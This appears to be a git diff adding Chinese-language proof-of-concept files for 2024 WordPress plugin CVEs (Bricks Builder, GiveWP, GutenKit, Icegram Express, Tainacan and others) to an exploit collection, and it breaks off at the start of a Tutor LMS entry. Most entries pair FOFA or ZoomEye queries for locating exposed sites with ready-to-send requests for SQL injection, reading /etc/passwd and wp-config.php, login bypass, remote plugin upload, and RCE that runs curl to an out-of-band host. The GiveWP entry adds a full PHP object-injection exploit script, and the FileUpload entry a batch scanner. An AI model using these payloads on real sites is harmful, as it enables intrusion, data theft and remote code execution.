+GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cuser%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Host: your-ip
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+```
+
+![image-20240814095848331](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408140959983.png)
\ No newline at end of file
diff --git a/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md b/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md
new file mode 100644
index 0000000..846ae6a
--- /dev/null
+++ b/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md
@@ -0,0 +1,19 @@
+## WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)
+
+## fofa
+```
+"/wp-content/plugins/wp-automatic"
+```
+
+## poc
+```
+GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+Connection: close
+Accept: */*
+Accept-Language: en
+Accept-Encoding: gzip
+```
+
+![8053915951936ca9109843fe4c581ce4](https://github.com/wy876/POC/assets/139549762/f5c6497f-29f9-47de-aa15-f072541a1d1b)
diff --git a/WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md b/WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md
new file mode 100644
index 0000000..35c3b6b
--- /dev/null
+++ b/WordPress插件Bricks-Builder存在RCE漏洞(CVE-2024-25600).md
@@ -0,0 +1,49 @@
+## WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600)
+
+## zoomeye
+```
+web.body="/wp-content/themes/bricks/"
+```
+
+## poc
+
+### 获取nonce值
+```
+GET / HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0
+Connection: close
+Accept-Encoding: gzip, deflate
+```
+![f8692e900e34adeb6f8b23677258b8e1](https://github.com/wy876/POC/assets/139549762/656552ce-28a6-407a-b746-56bd36ea3eb0)
+
+### rce
+```
+POST /wp-json/bricks/v1/render_element HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
+Connection: close
+Content-Length: 401
+Content-Type: application/json
+Accept-Encoding: gzip, deflate
+
+{
+  "postId": "1",
+  "nonce": "c5b5949**",
+  "element": {
+    "name": "container",
+    "settings": {
+      "hasLoop": "true",
+      "query": {
+        "useQueryEditor": true,
+        "queryEditor": "ob_start();echo `curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
+        "objectType": "post"
+      }
+    }
+  }
+}
+```
+![78880674cd49cefc6d5787c30efaf8cd](https://github.com/wy876/POC/assets/139549762/986bebf0-4369-462b-923c-775434318338)
+
+## 漏洞分析
+- https://xz.aliyun.com/t/13833
diff --git a/WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md b/WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md
new file mode 100644
index 0000000..ac4f2c1
--- /dev/null
+++ b/WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989).md
@@ -0,0 +1,30 @@
+# WordPress插件Crypto身份认证绕过漏洞复现(CVE-2024-9989)
+
+WordPress 的 Crypto 插件在 2.15 及以下版本（包括 2.15）中容易受到身份验证绕过攻击。这是由于对 'crypto_connect_ajax_process' 函数中 'crypto_connect_ajax_process：：log_in' 函数的任意方法调用有限。这使得未经身份验证的攻击者可以以站点上的任何现有用户（例如管理员）身份登录（如果他们有权访问用户名）
+
+## fofa
+```javascript
+"wp-content/plugins/crypto/"
+```
+
+## poc
+```javascript
+GET /wp-admin/admin-ajax.php?action=crypto_connect_ajax_process&method_name=register&param1=admin HTTP/1.1
+Host: 127.0.0.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041352219.webp)
+
+**成功会显示Success 并赋予Cookie 然后再访问/wp-admin 即可登入管理账号.**
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041352673.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/hC8A1DeS-LWGpNIFKeiMBQ
\ No newline at end of file
diff --git a/WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md b/WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md
new file mode 100644
index 0000000..f5f4950
--- /dev/null
+++ b/WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935).md
@@ -0,0 +1,21 @@
+# WordPress插件ElementorPageBuilder存在文件读取漏洞(CVE-2024-9935)
+<font style="color:rgb(51, 51, 51);">WordPress是一款免费开源的内容管理系统(CMS)，最初是一个博客平台，但后来发展成为一个功能强大的网站建设工具，适用于各种类型的网站，包括个人博客、企业网站、电子商务网站等，并逐步演化成一款内容管理系统软件。Wordpress ElementorPageBuilder插件存在文件读取漏洞(CVE-2024-9935)</font>
+
+## fofa
+```javascript
+body="wp-content/plugins/pdf-generator-addon-for-elementor-page-builder/"
+```
+
+## poc
+```plain
+GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733332897353-929b7478-0833-4bbc-bc98-db28b9d1bca9.png)
+
diff --git a/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md b/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
new file mode 100644
index 0000000..5d6998e
--- /dev/null
+++ b/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
@@ -0,0 +1,116 @@
+# WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047)
+
+WordPress File Upload插件是一款功能强大的WordPress站点文件上传插件，在 <= 4.24.11 版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+"wp-content/plugins/wp-file-upload"
+```
+
+## poc
+```python
+import requests
+import urllib3
+from urllib.parse import urljoin
+import argparse
+import ssl
+import time
+import re
+
+ssl._create_default_https_context = ssl._create_unverified_context
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def read_file(file_path):
+    with open(file_path, 'r') as file:
+        urls = file.read().splitlines()
+    return urls
+
+def extract_version(version_text):
+    match = re.search(r'<strong>Version\s+([0-9]+\.[0-9]+\.[0-9]+)</strong>', version_text)
+    if match:
+        version = match.group(1).strip()  
+        print(f"Found version: {version}")
+        return version
+    return None
+
+def version_to_tuple(version):
+    return tuple(map(int, version.split('.')))
+
+def compare_versions(current_version, target_version='4.24.11'):
+    if current_version:
+        current_tuple = version_to_tuple(current_version)
+        target_tuple = version_to_tuple(target_version)
+        
+        if current_tuple <= target_tuple:
+            print(f"\033[32mVersion {current_version} <= {target_version} - 可能存在漏洞\033[0m")
+            return True
+        else:
+            print(f"Version {current_version} > {target_version} - 无漏洞.")
+            return False
+    return False  
+
+def check(url):
+    protocols = ['http://', 'https://']
+    found_vulnerabilities = False
+
+    for protocol in protocols:
+        target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/")
+        print(f"Checking {target_url}wp-content")
+        
+        timestamp = str(int(time.time()))
+        
+        target_url = urljoin(target_url, "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=pQ1DyzbQp5hBxQpW&ticket=Hw8h7dBmxROx27ZZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce")
+        target_url_version = urljoin(target_url, "/wp-content/plugins/wp-file-upload/release_notes.txt")
+        
+        headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
+            "Cookie": f"wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce=cfyMMnYQqNBbcBNMLTCDnE7ezEAdzLC3; wfu_storage_pQ1DyzbQp5hBxQpW=/../../../../../etc/passwd[[name]]; wfu_download_ticket_Hw8h7dBmxROx27ZZ={timestamp}; wfu_ABSPATH=/;"
+        }
+        headers_version = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
+        }
+
+        try:
+            response_version = requests.get(target_url_version, verify=False, headers=headers_version, timeout=10)
+
+            if response_version.status_code == 200:
+                version_text = response_version.text
+                version = extract_version(version_text)
+                
+                if compare_versions(version):
+                    response = requests.get(target_url, verify=False, headers=headers, timeout=10)
+                    if response.status_code == 200 and all(key in response.text for key in ('/bin/bash', 'root:x:0:0')):
+                        print(f"\033[31mFind: {url}: WordPress_FileUpload (CVE-2024-9047) - ReadAnyFile!\033[0m")
+                        found_vulnerabilities = True
+                else:
+                    print(f"版本不匹配跳过检查{url}.")
+            else:
+                print(f"找不到版本号 {url}.")
+
+        except Exception as e:
+            print(f"Error while checking {url}: {e}")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="WordPress 任意文件读取漏洞检测")
+    parser.add_argument("-u", "--url", help="单个url检测")
+    parser.add_argument("-f", "--txt", help="批量检测")
+    args = parser.parse_args()
+    
+    url = args.url
+    txt = args.txt
+    
+    if url:
+        check(url)
+    elif txt:
+        urls = read_file(txt)
+        for url in urls:
+            check(url)
+    else:
+        print("help")
+```
+
+![image-20241227214033657](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272140753.png)
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-2024-9047-PoC/blob/main/WordPress_FileUpload(CVE-2024-9047)_ReadAnyFile.py
\ No newline at end of file
diff --git a/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md b/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md
new file mode 100644
index 0000000..06f613e
--- /dev/null
+++ b/WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932).md
@@ -0,0 +1,287 @@
+# WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932)
+
+WordPress中的GiveWP捐款插件和募捐平台插件存在PHP对象注入漏洞，该漏洞存在于所有版本，包括最高版本3.14.1在内。漏洞源于对来自“give_title”参数的不可信输入进行反序列化操作。这使得未经身份验证的攻击者能够注入PHP对象。此外，如果存在POP链，攻击者可以远程执行代码并删除任意文件。
+
+## poc
+
+### 生成pop链 poc.php
+
+```php
+<?php
+namespace Stripe{
+	class StripeObject
+	{
+		protected $_values;
+		public function __construct(){
+			$this->_values['foo'] = new \Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData();
+		}
+	}
+}
+
+namespace Give\PaymentGateways\DataTransferObjects{
+	class GiveInsertPaymentData{
+    public $userInfo;
+		public function __construct()
+    {
+        $this->userInfo['address'] = new \Give();
+    } 
+	}
+}	
+
+namespace{
+	class Give{
+		protected $container;
+		public function __construct()
+		{
+			$this->container = new \Give\Vendors\Faker\ValidGenerator();
+		}
+	}
+}
+
+namespace Give\Vendors\Faker{
+	class ValidGenerator{
+		protected $validator;
+		protected $generator;
+		public function __construct()
+		{
+			$this->validator = "shell_exec";
+			$this->generator = new \Give\Onboarding\SettingsRepository();
+		}
+	}
+}
+
+namespace Give\Onboarding{
+	class SettingsRepository{
+		protected $settings;
+		public function __construct()
+		{
+			$this -> settings['address1'] = 'touch /tmp/EQSTtest';
+		}
+	}
+}
+
+namespace{
+	$a = new Stripe\StripeObject();
+	echo serialize($a);
+}
+```
+
+### 漏洞复现
+
+**获取give_form_id**
+
+```php
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: 192.168.178.100:9000
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 23
+Connection: keep-alive
+sec-ch-ua-platform: "Windows"
+sec-ch-ua: "Google Chrome";v="101", "Chromium";v="101", "Not=A?Brand";v="24"
+sec-ch-ua-mobile: ?0
+
+action=give_form_search
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050947910.png)
+
+**获取 give-form-hash**
+
+```
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: 192.168.178.100:9000
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 47
+Connection: keep-alive
+sec-ch-ua-platform: "Windows"
+sec-ch-ua: "Google Chrome";v="101", "Chromium";v="101", "Not=A?Brand";v="24"
+sec-ch-ua-mobile: ?0
+
+action=give_donation_form_nonce&give_form_id=11
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409050948442.png)
+
+
+
+**give_title 填入poc.php生成的序列化数据**
+
+```php
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: 192.168.178.100:9000
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 653
+Connection: keep-alive
+sec-ch-ua-platform: "Windows"
+sec-ch-ua: "Google Chrome";v="101", "Chromium";v="101", "Not=A?Brand";v="24"
+sec-ch-ua-mobile: ?0
+
+action=give_process_donation&give-form-hash=cc27fec673&give-form-id=11&give_email=1@random.com&give_first=a&give-amount=10&give-gateway=manual&give_stripe_payment_method=&give_last=b&give_title=to_be_unserialized
+```
+
+
+
+### 利用脚本
+
+```python
+import requests
+from bs4 import BeautifulSoup
+from faker import Faker
+from urllib.parse import urlparse
+import random
+import hashlib
+import time
+import sys
+import re
+import rich_click as click
+
+requests.packages.urllib3.disable_warnings(
+    requests.packages.urllib3.exceptions.InsecureRequestWarning
+)
+
+banner = r""" 
+Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
+
+=============================================================================================================    
+
+CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
+description: The GiveWP  Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
+Arbitrary File Deletion
+
+============================================================================================================= 
+    """
+
+class GiveWPExploit:
+
+    def __init__(self, url: str, file: str):
+        self.url = url
+        self.file = file
+
+    def greeting() -> None:
+        print(banner)
+
+    def spinner(duration=10, interval=0.1) -> None:
+        spinner_chars = ['|', '/', '-', '\\']
+        end_time = time.time() + duration
+        while time.time() < end_time:
+            for char in spinner_chars:
+                sys.stdout.write(f'\r[{char}] Exploit loading, please wait...')
+                sys.stdout.flush()
+                time.sleep(interval)
+        print("")
+
+    def getBaseUrl(self, url):
+        parsed_url = urlparse(url)
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
+        return base_url
+
+    def getParams(self) -> dict:
+        response = requests.get(self.url)
+        soup = BeautifulSoup(response.text, 'html.parser')
+
+        give_form_id = soup.find('input', {'name': 'give-form-id'})['value']
+        give_form_hash = soup.find('input', {'name': 'give-form-hash'})['value']
+        button_tag = soup.find('button', {'data-price-id': True})
+        give_price_id = button_tag['data-price-id']
+        give_amount = button_tag.get_text(strip=True)
+
+        # Fake Userinfo
+        fake = Faker()
+        
+        params = {"give-form-id" : give_form_id, 
+                  "give-form-hash" : give_form_hash, 
+                  "give-price-id" : give_price_id,
+                  "give-amount" : give_amount,
+                  "give_first": fake.first_name(),
+                  "give_last": fake.last_name(),
+                  "give_email": fake.email(),}
+        
+        return params
+
+    def getData(self) -> dict:
+        file = self.file
+        rand_md5 = hashlib.md5(str(random.randint(0, 10)).encode()).hexdigest()
+        # Payload
+        payload = 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}' % (len(file), file)
+        data = self.getParams()
+        data['give_title'] = payload
+        data['give-gateway'] = 'offline'
+        data['action'] = 'give_process_donation'
+        print(f"[+] Requested Data: ")
+        print(data)
+        return data
+
+    def isEmbed(self, url: str) -> str:
+        pattern = r'<iframe[\s\S]*?\bname="give-embed-form"[\s\S]*?>'
+        response = requests.get(url)
+        match = re.search(pattern, response.text)
+        if match:
+            soup1 = BeautifulSoup(response.text, 'html.parser')
+            embed_url = soup1.find('iframe')['src']
+            return embed_url
+        else:
+            return url
+        
+    def sendRequest(self) -> None:
+        # Fake User_Agent
+        fake = Faker()
+        baseUrl = self.getBaseUrl(self.url)
+        reqUrl = f"{baseUrl}/wp-admin/admin-ajax.php"
+        data = self.getData()
+        headers = {
+            'User-Agent': fake.user_agent(),
+            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+            'Accept-Encoding': 'gzip, deflate, br'
+        }
+        response = requests.post(reqUrl, data=data, headers=headers)
+
+    def exploit(self) -> None:
+        self.url = self.isEmbed(self.url)
+        self.sendRequest()
+
+# argument parsing with rich_click
+@click.command()
+@click.option(
+    "-u",
+    "--url",
+    required=True,
+    help="Specify a URL or domain for vulnerability detection (Donation-Form Page)",
+)
+@click.option(
+    "-c",
+    "--cmd",
+    default="/tmp/test",
+    help="Specify the file to read from the server",
+)
+
+def main(url: str, cmd: str) -> None:
+    cve_exploit = GiveWPExploit(url, cmd)
+    GiveWPExploit.greeting()
+    GiveWPExploit.spinner(duration=1)
+    cve_exploit.exploit()
+
+if __name__ == "__main__":
+    main()
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/EQSTLab/CVE-2024-5932
+- https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/
\ No newline at end of file
diff --git a/WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md b/WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md
new file mode 100644
index 0000000..2c8031c
--- /dev/null
+++ b/WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234).md
@@ -0,0 +1,35 @@
+# WordPress插件GutenKit存在任意文件上传漏洞(CVE-2024-9234)
+
+GutenKit - 用于 WordPress 的古腾堡块编辑器插件的页面构建器块、模式和模板容易受到任意文件上传的攻击，因为在所有版本中缺少对 install_and_activate_plugin_from_external() 函数（install-active-plugin REST API 端点）的功能检查至（并包括）2.1.0。这使得未经身份验证的攻击者可以安装和激活任意插件，或利用该功能上传像插件一样欺骗的任意文件。
+
+## fofa
+
+```java
+body="wp-content/plugins/gutenkit-blocks-addon"
+```
+
+## poc
+
+```javascript
+POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+
+plugin=http://vps-ip/rce.zip
+```
+
+![image-20241018155657418](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181556493.png)
+
+文件路径`/wp-content/plugins/rce.php`
+
+
+
+## 漏洞来源
+
+- https://nvd.nist.gov/vuln/detail/CVE-2024-9234
+- [Wordpress GutenKit 插件 远程文件写入致RCE漏洞复现(CVE-2024-9234)_漏洞复现-CSDN专栏](https://download.csdn.net/blog/column/10118303/142984860)
\ No newline at end of file
diff --git a/WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md b/WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md
new file mode 100644
index 0000000..ac34521
--- /dev/null
+++ b/WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295).md
@@ -0,0 +1,96 @@
+# WordPress插件Icegram-Express存在未经身份验证的SQL注入漏洞(CVE-2024-4295)
+
+WordPress 的 Icegram Express 插件的电子邮件订阅者在 5.7.20 及之前的所有版本中都容易通过“hash”参数受到 SQL 注入攻击，原因是对用户提供的参数转义不充分，并且对现有 SQL 缺乏充分的准备询问。 这使得未经身份验证的攻击者可以将额外的 SQL 查询附加到现有的查询中，这些查询可用于从数据库中提取敏感信息。
+
+## fofa
+
+```javascript
+body="/wp-content/plugins/email-subscribers/"
+```
+
+## poc
+
+```javascript
+POST /wp-admin/admin-post.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+
+page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131420209.webp)
+
+```javascript
+id: CVE-2024-4295
+
+info:
+  name: Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Email Subscribers by Icegram Express <= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.
+  remediation: Fixed in 5.7.21
+  impact: This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/641123af-1ec6-4549-a58c-0a08b4678f45?source=cve
+    - https://github.com/cve-2024/CVE-2024-4295-Poc
+    - https://github.com/truonghuuphuc/CVE-2024-4295-Poc
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4295
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-4295
+    cwe-id: CWE-89
+    epss-score: 0.00091
+    epss-percentile: 0.39447
+    cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:*
+  metadata:
+    vendor: icegram
+    product: email_subscribers_\&_newsletters
+    framework: wordpress
+    verified: true
+    max-request: 1
+    publicwww-query: "/wp-content/plugins/email-subscribers/"
+    fofa-query: body="/wp-content/plugins/email-subscribers/"
+  tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli
+
+flow: http(1) && http(2)
+
+variables:
+  contact_id: "{{contact_id}}"
+  email: "{{email}}"
+  rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(8)"],"action":"subscribe"}'
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/wp-content/plugins/email-subscribers/readme.txt"
+
+    stop-at-first-match: true
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(body, "email-subscribers-", "Email Subscribers by Icegram Express")'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=8'
+          - 'contains(body, "You have been successfully subscribed")'
+        condition: and
+```
+
+## 漏洞来源
+
+- https://github.com/projectdiscovery/nuclei-templates/blob/d7a064daf93a42628df88d043b737c7297143645/http/cves/2024/CVE-2024-4295.yaml
+- https://mp.weixin.qq.com/s/Shni_iBVEDEP2q-Ng0qcNw
\ No newline at end of file
diff --git a/WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md b/WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md
new file mode 100644
index 0000000..52b0c50
--- /dev/null
+++ b/WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135).md
@@ -0,0 +1,28 @@
+# WordPress插件Tainacan存在前台任意文件读取漏洞(CVE-2024-7135)
+
+由于 0.21.7 之前（包括 0.21.7）的所有版本中缺少对“get_file”功能的功能检查，因此适用于 WordPress 的 Tainacan 插件容易受到未经授权的数据访问。该函数还容易受到目录遍历的攻击。这使得经过身份验证的攻击者（具有订阅者级别和更高级别访问权限）能够读取服务器上的任意文件的内容，这些文件可能包含敏感信息。
+
+## fofa
+
+```javascript
+"wp-content/plugins/tainacan/"
+```
+
+## poc
+
+首先要注册一个普通用户并登录，然后获取一下网站首页的Nonce，之后就可以直接读取了
+
+```javascript
+GET /wp-json/tainacan/v2/bg-processes/file?guid=../../../wp-config.php&_wpnonce=替换目标网站nonce HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: no-cache
+Connection: keep-alive
+Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=57p45m6lctlfttfrsjfpk4fui9; wp_lang=zh_CN; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1729391061%7ColYyhIIyEr3yA8JstL99jsKU6rCXsMPR8tQH6nNauzP%7C59e8715eb35b44ed9532e025052b7ef1748b384a9e03a39a9538cd4cd18ffdbe; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26mfold%3Do; wp-settings-time-1=1729218262
+Host: 127.0.0.1
+```
+
+![46a373971b5c0c4c637b280c889d2f91](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181624561.png)
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181624425.webp)
\ No newline at end of file
diff --git a/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md b/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
new file mode 100644
index 0000000..db037ad
--- /dev/null
+++ b/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
@@ -0,0 +1,98 @@
+# WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)
+
